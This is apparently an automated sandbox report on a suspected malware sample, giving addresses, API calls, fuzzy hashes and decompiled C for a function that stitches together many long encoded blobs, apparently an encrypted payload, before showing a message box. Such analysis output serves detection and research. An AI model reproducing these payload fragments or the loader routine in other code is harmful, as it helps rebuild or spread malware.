                                                                              0x00403a58
                                                                              0x00403a68
                                                                              0x00403a75
                                                                              0x00403a82
                                                                              0x00403a8f
                                                                              0x00403a9c
                                                                              0x00403aac
                                                                              0x00403ab9
                                                                              0x00403ac6
                                                                              0x00403ad3
                                                                              0x00403ae0
                                                                              0x00403aed
                                                                              0x00403afd
                                                                              0x00403b0a
                                                                              0x00403b17
                                                                              0x00403b24
                                                                              0x00403b31
                                                                              0x00403b41
                                                                              0x00403b4e
                                                                              0x00403b5b
                                                                              0x00403b74
                                                                              0x00403b79
                                                                              0x00403b7b
                                                                              0x00403b7b
                                                                              0x00403b7e
                                                                              0x00000000
                                                                              0x00403b7e
                                                                              0x00402801
                                                                              0x00402801
                                                                              0x00000000
                                                                              0x00402801
                                                                              0x004021e8
                                                                              0x004021ea
                                                                              0x004021ec
                                                                              0x004021ed
                                                                              0x004021f1
                                                                              0x004021f6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402205
                                                                              0x00402207
                                                                              0x00402209
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403b82

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog_strlen
                                                                              • String ID: ,D
                                                                              • API String ID: 3871006878-2732034087
                                                                              • Opcode ID: 78503eb8bda5379a5748b6bc8a39e378feb661ae0f95b78aa615e8a5f30ae69e
                                                                              • Instruction ID: a7deb7227297712cf3bdcb64e54be95acca9d37a8c266f1eedefbba9de0a961a
                                                                              • Opcode Fuzzy Hash: 78503eb8bda5379a5748b6bc8a39e378feb661ae0f95b78aa615e8a5f30ae69e
                                                                              • Instruction Fuzzy Hash: 18C296B5A01A5831ED223BB34E4FC8F1A2D8EA674C704443FF91EB91E2D97D965140BE
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 022214F2, Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000008,02230000,02221A84,?,?,?,?,?,?,?,022210F5), ref: 022214F5
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 022214FC
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Heap$AllocateProcess
                                                                              • String ID:
                                                                              • API String ID: 1357844191-0
                                                                              • Opcode ID: c7515e21c204390da2694ab3cc5b122e5027b60f5fe443c5cbe64240f85bccd4
                                                                              • Instruction ID: fcf8bbb3c1694246d133e8bf8d19531d4319c54756da1e77cdfbb13edc8a392f
                                                                              • Opcode Fuzzy Hash: c7515e21c204390da2694ab3cc5b122e5027b60f5fe443c5cbe64240f85bccd4
                                                                              • Instruction Fuzzy Hash: 00A01270C80200AFDF0097F0B90DA153918B740302F004A04724580080C9E10420DB20
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00416EBA, Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00416EBA() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00416E6C); // executed
				 *0x45a5c0 = _t1;
				return 0;
			}




                                                                              0x00416ebf
                                                                              0x00416ec5
                                                                              0x00416ecc

                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00016E6C), ref: 00416EBF
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 9b070c8e7664c2061faeda21353ca202bd96980014065dbc4317b0ac77534f63
                                                                              • Instruction ID: 182cd092810339332b43a940da52a17baea2225a7a2ca06b9d8a25eee5fd08e7
                                                                              • Opcode Fuzzy Hash: 9b070c8e7664c2061faeda21353ca202bd96980014065dbc4317b0ac77534f63
                                                                              • Instruction Fuzzy Hash: 91A011B8A003008B83008F30AC088003AA0B200A02B028233E802C2228FBB280A08A2A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00403C31, Relevance: 332.3, APIs: 2, Strings: 186, Instructions: 3327windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 403c31-405bce call 4128a0 call 401d2e call 402141 call 401976 call 403ba9 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 990 405bd3-405d13 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 0->990 1030 405d18-405d25 call 403be3 990->1030 1032 405d2a-405d44 call 401fb3 call 4019d5 1030->1032 1036 405d49-405d56 call 403be3 1032->1036 1038 405d5b-405db8 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 1036->1038 1050 405dbd-405dca call 401fb3 1038->1050 1052 405dcf-405dd7 call 4019d5 1050->1052 1054 405ddc-405de9 call 403be3 1052->1054 1056 405dee-405e08 call 401fb3 call 4019d5 1054->1056 1060 405e0d-405e1a call 403be3 1056->1060 1062 405e1f-405e39 call 401fb3 call 4019d5 1060->1062 1066 405e3e-405e4b call 403be3 1062->1066 1068 405e50-405e6a call 401fb3 call 4019d5 1066->1068 1072 405e6f-405e7c call 403be3 1068->1072 1074 405e81-405f40 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 call 403be3 call 401fb3 call 4019d5 1072->1074 1097 405f42 1074->1097 1098 405f45-405f5b call 401784 1074->1098 1097->1098 1101 405f5d-405f67 call 40215a 1098->1101 1102 405f7f-405f99 call 4019d5 1098->1102 1105 405f6c-405f79 MessageBoxA 1101->1105 1105->1102
                                                                              C-Code - Quality: 53%
                                                                              			E00403C31(void* __ecx, void* __eflags) {
				void* __edi;
				void* _t1115;
				void* _t1120;
				void* _t1125;
				void* _t1130;
				void* _t1135;
				void* _t1140;
				void* _t1145;
				void* _t1150;
				void* _t1155;
				void* _t1160;
				void* _t1165;
				void* _t1170;
				void* _t1175;
				void* _t1180;
				void* _t1185;
				void* _t1190;
				void* _t1195;
				void* _t1200;
				void* _t1205;
				void* _t1210;
				void* _t1215;
				void* _t1220;
				void* _t1225;
				void* _t1230;
				void* _t1235;
				void* _t1240;
				void* _t1245;
				void* _t1250;
				void* _t1255;
				void* _t1260;
				void* _t1265;
				void* _t1270;
				void* _t1275;
				void* _t1280;
				void* _t1285;
				void* _t1290;
				void* _t1295;
				void* _t1300;
				void* _t1305;
				void* _t1310;
				void* _t1315;
				void* _t1320;
				void* _t1325;
				void* _t1330;
				void* _t1335;
				void* _t1340;
				void* _t1345;
				void* _t1350;
				void* _t1355;
				void* _t1360;
				void* _t1365;
				void* _t1370;
				void* _t1375;
				void* _t1380;
				void* _t1385;
				void* _t1390;
				void* _t1395;
				void* _t1400;
				void* _t1405;
				void* _t1410;
				void* _t1415;
				void* _t1420;
				void* _t1425;
				void* _t1430;
				void* _t1435;
				void* _t1440;
				void* _t1445;
				void* _t1450;
				void* _t1455;
				void* _t1460;
				void* _t1465;
				void* _t1470;
				void* _t1475;
				void* _t1480;
				void* _t1485;
				void* _t1490;
				void* _t1495;
				void* _t1500;
				void* _t1505;
				void* _t1510;
				void* _t1515;
				void* _t1520;
				void* _t1525;
				void* _t1530;
				void* _t1535;
				void* _t1540;
				void* _t1545;
				void* _t1550;
				void* _t1555;
				void* _t1560;
				void* _t1565;
				void* _t1570;
				void* _t1575;
				void* _t1580;
				void* _t1585;
				void* _t1590;
				void* _t1595;
				void* _t1600;
				void* _t1605;
				void* _t1610;
				void* _t1615;
				void* _t1620;
				void* _t1625;
				void* _t1630;
				void* _t1635;
				void* _t1640;
				void* _t1645;
				void* _t1650;
				void* _t1655;
				void* _t1660;
				void* _t1665;
				void* _t1670;
				void* _t1675;
				void* _t1680;
				void* _t1685;
				void* _t1690;
				void* _t1695;
				void* _t1700;
				void* _t1705;
				void* _t1710;
				void* _t1715;
				void* _t1720;
				void* _t1725;
				void* _t1730;
				void* _t1735;
				void* _t1740;
				void* _t1745;
				void* _t1750;
				void* _t1755;
				void* _t1760;
				void* _t1765;
				void* _t1770;
				void* _t1775;
				void* _t1780;
				void* _t1785;
				void* _t1790;
				void* _t1795;
				void* _t1800;
				void* _t1805;
				void* _t1810;
				void* _t1815;
				void* _t1820;
				void* _t1825;
				void* _t1830;
				void* _t1835;
				void* _t1840;
				void* _t1845;
				void* _t1850;
				void* _t1855;
				void* _t1860;
				void* _t1865;
				void* _t1870;
				void* _t1875;
				void* _t1880;
				void* _t1885;
				void* _t1890;
				void* _t1895;
				void* _t1900;
				void* _t1905;
				void* _t1910;
				void* _t1915;
				void* _t1920;
				void* _t1925;
				void* _t1930;
				void* _t1935;
				void* _t1940;
				void* _t1945;
				void* _t1950;
				void* _t1955;
				void* _t1960;
				void* _t1965;
				void* _t1970;
				void* _t1975;
				void* _t1980;
				void* _t1985;
				void* _t1990;
				void* _t1995;
				void* _t2000;
				void* _t2005;
				void* _t2010;
				void* _t2015;
				intOrPtr _t2018;
				intOrPtr* _t2025;
				signed int _t2032;
				void* _t2408;
				void* _t2411;

				E004128A0(E004309EF, _t2411);
				_push(0x4326f8);
				_push(",�D");
				E00402141(_t2411, E00401D2E(__eflags));
				_t2032 = 0xb;
				_t2408 = "q}?OVQPpOWQx9b8PK*w|Ke78z?zLRL47tDuXbd%a~IZ";
				memcpy(_t2411 - 0x78, _t2408, _t2032 << 2);
				 *((intOrPtr*)(_t2411 - 0x18)) = 0xf;
				E00401976(_t2411 - 0x30, 0);
				 *((intOrPtr*)(_t2411 - 4)) = 0;
				E00403BA9(_t2411 - 0x30, "IKZAbiOomcpNQvba9/2vWSR2k9nHX/bu7DMphhVaCFZnqpIaNpf4byZ9n6K6jEazsr4s4ZQT5TLzGQjbXB1mtTIljPE5KSV8l+ytxaCr3sHwFEtdGc5SYfBwP1wSHbz3oOsjqTISYBZWZ6/+K0O0Awtjutmhbb91mWnZKycuzmXGlJDM5/YqeOvqnNya+7peHP56C5VvUtMtus4y1gHA1vu0hJrNxXoLkai/Pjwl7R8Aucc4ESkGEtHcY6M6uGH3daOy5rtGHrmtwHU1lB38SqUQUfYmODii75CsNJ3n71P3TEKO7cNBlVybCvpGSoBM4mppRH4Th+Xy3tnb1IUkAQZwihaOrg9lMmG4GDBQfXgR96NYt/bIPaZ766mw9VoMVYB3uMokePMu66GGf03OATXFzw+4Ms1aNvhkMdUk2w5QAJpRaOeiOdITvD7ojfqf8piUq5ySOuccX9j0vD8bYfzvf40018zKH5ihq0BbW8QpAtmdMNub");
				_push("93HwZuDaFVoWiLi9WkMfVlo6LpDnQg052S6NUMTFmBH64MdRVnmMzlr6l6CMs+nddFnuwLRo6ip/fee7MmibV78AWKFnmflEcuAdqiIENqSZuYYSj2YBUkrvH6fmHxUVP2rhu+OdOmi2EW0EFZBJH90ph8foGOUwolOjBvJiwc+Fgrh+Y7nVZxVM2Fji/aiYbR9n31RvKfX+ZPc+dGr+jT9iBwzhapdYKRy5oOFrHVl599yEEL2GWWAsaE0zbpqjjDolMdAsqyNtuEHFV//qfMl7ARBBXJoc6CIIaUO08QLU9cxNIDnBFUZ3ethCglLI0qC48ErQ/Ir8mlsmrpZTUh2ZBbNNueF88KtmQXej3Kj1vmYfxyt7aGDcq9mjBxGs2U0lG/iRK+bzmxgDyiUwJk9wg3/V7g4cRX2yANab/AEuirD4Vs1NXYgQ4Gpb/BX83tC21I0nsVHU/aCOPZhJs10sXdj5I/H3N0o5EYV1OamMEt5AJ5wF");
				_push(_t2411 - 0x30);
				_push(_t2411 - 0x4c);
				_t1115 = E00403BE3(_t2408 + _t2032 + _t2032);
				_t2409 = _t2408 | 0xffffffff;
				 *((char*)(_t2411 - 4)) = 1;
				E00401FB3(_t2411 - 0x30, _t1115, 0, _t2408 | 0xffffffff);
				 *((char*)(_t2411 - 4)) = 0;
				E004019D5(_t2411 - 0x4c, 1, 1, 0);
				_push("cWdv1jTdIYA1ypP75sHnMX48blyTcVOu3Ax9T/NeCVu+cGhU8dIEX24RNYrJyI7JSVlq0adxQBicmZ9zF7ROFal3pL0uIg01gOcbZt5YY+eU3Y7y3ShOH+tyCnHsITfMtNCvTvJ4Ne+VFHDlwh7uwyDgAgmAhXamaSBwr7Dfp137rudCfonlD2OHb9mNNAif6INVTzWfLXs69wDIsLRru9IPgC+9V7GVi70JAm4k4XBz8iu0v9rsVTgvqlbbwqh9C7XHlKs7Tl7U2PBgiaKFBS9cV8mPu45auPJHDX46mB2rKZfO+heBHa2dENhmTv5XtsfcfYt7bFm0H05+hWOxxP1X7wraocd+Qp2Phs8TffnTgFcgLmJfCOkQ2zO2lAiXl8LIkDNfvoFVkMYQ7NdpG+bG1yhZ6q+f/wDxZgEE6sCcwp/Bq/SgYdOoVTg5olPe0bz3Y8gsVwuHJMDKwokmIwe12vdMwwRW7CKZ4eiy1HNV6KJjsqfj");
				_push(_t2411 - 0x30);
				_push(_t2411 - 0x4c);
				_t1120 = E00403BE3(1);
				 *((char*)(_t2411 - 4)) = 2;
				E00401FB3(_t2411 - 0x30, _t1120, 0, _t2408 | 0xffffffff);
				 *((char*)(_t2411 - 4)) = 0;
				E004019D5(_t2411 - 0x4c, 1, 1, 0);
				_push("3wZRX98PuWFLpeen33t/juTI+EaeQW1aBe/M1I2BQe9REagaO684YEa7uYWE+diUT2Z1l4iiERgMob34XnDTaE+EfG9GjA9dQ+dwHWKM5viy/PvZe/uZjtJWvm5y90yBNvw2dGh2JZdtnB3yRQ1NdMUeM3fmrOiEZvsL2eCcJ/GRk1vBQJIHJaG/XDkCWaWn6FpENCNLpsMoq+cmEAOB+yQ0blZmW9qqaFkZuIUwIvqjeD95u3lPk0dxRYHl6q+bJNlr6Og/OrG40l8bhnz2queoXoyf2Npz3QIQF/jJ98eC6CvxNrfQHABPIcGKv2K2Dwxz86ejwrwVt0k6WUeMx3UAm+5xNhihjWib+Nva5eUa4rBER6Ee74/BaH3tygLrnUOBNdrdrQ7J167O8MU+DUp6di3673wy9CBs3U4CM3VUBvl81FK/2YI9wjQWrya4TZ/gBQ7rMUjL70gGdaUG8C90qkIka5PmeTtD5gUYwG1YCOZgjQRB");
				_push(_t2411 - 0x30);
				_push(_t2411 - 0x4c); // executed
				_t1125 = E00403BE3(1); // executed
				 *((char*)(_t2411 - 4)) = 3;
				E00401FB3(_t2411 - 0x30, _t1125, 0, _t2408 | 0xffffffff);
				 *((char*)(_t2411 - 4)) = 0;
				E004019D5(_t2411 - 0x4c, 1, 1, 0);
				_push("nVYqA63oMX/TNvMCAEkXgW2rMWHj7BHsir0ya6v2zRW5PkYxJaemISBqhg2kG6QpOAlqDEXhQ/aiPjb86xQ4xO/IqW+2xEYVTA5gZmnfZV0QXCD9KAGRPUJNmaUy6ZlFM+TBkNr5YGlZ11LeqEf5kaGycXjMddcnEc98PUjPbRl5f/Cs6+kO3Ixm/LxQ2sSEcf/fkmtOA77JmJNm1g0KYk6uK36cEgPO1JFdaJw+aPd9q/qVYRs92rh0idjIM64YTY8feQ87uuFy4T6X6KMSLBoF0x+uPe/+AIAykXb16ZS19MTigjW/55ALvwHSUpRTQ8LGt/7Zn9wewK6DNb0/v1Jy+PTCVXal3Zk1VjhTggsfEjx/2EFzSs1gayqes10V3Zv9WWbdbcR/vxW6Km+5WYde5ar7E78pkDr1gGq9RCHAK7IskO0bKRbK6uqphQKLGI5rSrt8QNg9sykFa18k+4PPP8s7ky92Qg2GeVQD6EEIXFHYz6+U");
				_push(_t2411 - 0x30);
				_push(_t2411 - 0x4c);
				_t1130 = E00403BE3(1);
				 *((char*)(_t2411 - 4)) = 4;
				E00401FB3(_t2411 - 0x30, _t1130, 0, _t2409);
				 *((char*)(_t2411 - 4)) = 0;
				E004019D5(_t2411 - 0x4c, 1, 1, 0);
				_push("i3HnDk2O9qodyHO9HgEIOenfac7zQKXx8fWDWwpR6vlIX45chU1Pp42FO2tbzVPOncCuExurwEvxHPlPPNBGTKpcXB57Lpi9DcUc1dHH0+v2Z+q+K7+tZqBIv0NnMwnnCvSEkR7WYCeUWtxN12Ed+V3P6AAbwVVQW1v+1TEpOUB8hlQVvqqZuydbOzvNxehoC6OvcgERs6uBBO77iEwXE2tixn3iqEdlBqL0y5RvNz1yCAKnWxV4RYjFYmPht3FOW0VpQSROqLbzpjCGsjwo3F/vl0QomKorgwLbk7E5MmisePF47zqvscoaVBkcIQ0JAL3dA3ReF2SDBeykLWL0R3eaIGkLAelmpbQ0dc4dsy+7iGy/O471XAfsj25zDZ0eqHSV5Buc1TPVTLDGhqwhHfmTe9qbIDgN4+gb4sa8qnQZQYLSJD5nYieIrdKuqLrCeK61OVTg+1N9VIU73g2dDxpuL+q4N7CM6VMt3i+PXTMUxdALSjsT");
				_push(_t2411 - 0x30);
				_push(_t2411 - 0x4c); // executed
				_t1135 = E00403BE3(1); // executed
				 *((char*)(_t2411 - 4)) = 5;
				E00401FB3(_t2411 - 0x30, _t1135, 0, _t2409);
				 *((char*)(_t2411 - 4)) = 0;
				E004019D5(_t2411 - 0x4c, 1, 1, 0);
				_push("rja7ufU1KPQVHymta/POmXV4qmu9cwr7cfgHEBjpDe2DzlUwypDUggi16Jl/pkLGuvFT2LBZNj+h6GU0diikz+tewFAqz+V4Evm0OgVL/hH/f3Qh0B9j80a7SYiNG7/VK8XigMqujQQ0zUAfV5rjMDzNxKmin5O39DUFrVJMzjSxonsGSzdzY5eKA/8aPWfkYWHGyswX/Z8FBiPEJlrSyb312V3bMvv1Yfza7oTUGizet63Fnxpidq8rPP2ezNmfUe0swcvzpx62KBj3Yvx/W1z06tgrEkogOhg1rT1IQ2ioGWHed/ZCrnS6zzTRyM0h3e/4ylob8mHwFId/jeJ+lCefq6Q6rSErG8K4viWG2fDuBkJO4N7vj9SL8sR0iZARcz3tIin63fi+L1AqfNHWb4Kz0xQpYFy2ZcechPBWShOfBoLTbushb9dObknV345VRWzZ/X8PlsF79QlZ5jhnQi2GBFBkEgF/huc//HezlFQ1+dYjL9IA");
				_push(_t2411 - 0x30);
				_push(_t2411 - 0x4c);
				_t1140 = E00403BE3(1);
				 *((char*)(_t2411 - 4)) = 6;
				E00401FB3(_t2411 - 0x30, _t1140, 0, _t2409);
				 *((char*)(_t2411 - 4)) = 0;
				E004019D5(_t2411 - 0x4c, 1, 1, 0);
				_push("+Goq6Dh98ajIsrqBI0zNDycQA7BWpJsUZG2mbA3Q5sIAdDcDU8AAJtsPu+0O8Q+TsQ4OmQb2RwfyIf2qfffsaEA0gRrw9zhN16MUVLp3fosOkByjAWb3cAjbBRqeqofVWPmINRuKs3JnfvLMZ8XUjPvMIksT85T7C47ob7hCz+qgdeVIX1pgwGPqHiCCsfkwpsMHYCEYGID8rYpcItBzGuZZ87T6+7DlCJZH9JJDR3a17cA+sTB/OPgqrIfvD9jZd3mOzHyokIMnoxmbiP9TTcZN4KYU0bQUBrsvqBkonGaDGUfDo9GjpKj+xDFXI8gJpktFegGhBG1fH0PDjSId+w83/lRt+MTG1Jazlk93/4TT1rBeLu+5k5XtuRRBk6tvnGfqVpSkrb4epu7WmzILgT2IjRhrozsZ5WFtLLuRV7bzAkQtJXMR4i3kGnY87DrQ/w7yLzhEoFmQBS9TGfhmSqhL725dFlVz0OPaUWOkUaeEAXidvgM0");
				_push(_t2411 - 0x30);
				_push(_t2411 - 0x4c); // executed
				_t1145 = E00403BE3(1); // executed
				 *((char*)(_t2411 - 4)) = 7;
				E00401FB3(_t2411 - 0x30, _t1145, 0, _t2409);
				 *((char*)(_t2411 - 4)) = 0;
				E004019D5(_t2411 - 0x4c, 1, 1, 0);
				_push("QgnP4sCvK83f3YRAyCpfISAFdkaAkovTuyuM6tRYNf3oA9Y3NVindnuk1qSdESncLqP2KE/XfAsF9+k0x1QYkenGQzgPRZdd47d0eOK8rQjx05EaF5agmrZrsr2ZGTsRG0pd1Ya+xWhJi02Ww0ucJ8WaW91ZXI+i2vZmfeEirqAmg6ujH3E4krw/4XbdjniQwCwFasE0jqQQ/0etS3h6buwrMM7QQh2PraVC5t5vG159+2pRNE7Iv8VNmeY3eBPd1xJXp4ndwoxUhWNZ1iZe1sFziJtNp+BTlVJDYAuKNIVsoNF4rr7RyFEFEKO+jbA4krqeBjTPgNOi0m07FuuncUa9eCRj46223Mh0wdP84HWPkKZS4hqvHGqnxpN3p0XwD6OFIVnG72Qg94dA4IWW3VmYKGpU2WQ7dHCJed4Xvoq1O91czxSct5At9WfOQ7Xh7uDo5btPoHf8osSyFSoN/mxAupQcTIT16gNDDEZZ8MPlLbfNZ5FC");
				_push(_t2411 - 0x30);
				_push(_t2411 - 0x4c);
				_t1150 = E00403BE3(1);
				 *((char*)(_t2411 - 4)) = 8;
				E00401FB3(_t2411 - 0x30, _t1150, 0, _t2409);
				 *((char*)(_t2411 - 4)) = 0;
				E004019D5(_t2411 - 0x4c, 1, 1, 0);
